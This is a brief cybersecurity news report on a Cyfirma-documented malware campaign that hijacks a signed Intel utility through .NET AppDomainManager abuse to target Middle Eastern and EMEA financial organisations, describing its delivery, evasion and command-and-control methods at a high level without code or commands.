Cybersecurity researchers have uncovered a malware campaign that abuses a legitimate Intel utility to evade detection and execute malicious code. According to Cyfirma, attackers are leveraging the digitally signed Intel binary (IAStorHelp.exe), using a technique known as AppDomain hijacking.
The technique exploits the .NET AppDomainManager mechanism, allowing attackers to run malicious code inside a trusted process without altering the original file. This makes it harder for traditional antivirus and endpoint detection systems to identify the threat.
The campaign mainly targets financial organizations across the Middle East and the EMEA region.
The attack begins with a spear-phishing email with a ZIP archive, containing multiple components, including a malicious shortcut file disguised as a PDF. When executed, it launches the Intel utility, which is silently hijacked via a crafted configuration file. This triggers early execution of attacker-controlled code within the .NET runtime.
The malware uses layered sandbox detection, including a 60-second delay and a computationally intensive key derivation loop with over 890,000 SHA-256 iterations. The payload is then decrypted and loaded directly into memory using reflective DLL techniques, avoiding common system APIs monitored by security tools.
The malware establishes command-and-control communication through Amazon CloudFront infrastructure using domain fronting. Attackers can then gain full remote access, potentially exposing credentials, financial data, and intellectual property.
“The framework exhibits strong fault tolerance through heap-based context recovery mechanisms, allowing it to maintain operational continuity even in unstable conditions. Overall, the combination of stealth, modularity, and resilience reflects a highly sophisticated threat capability that challenges conventional detection mechanisms and necessitates a shift toward behavior-driven security monitoring, memory forensics, and encrypted traffic inspection,” the report concludes.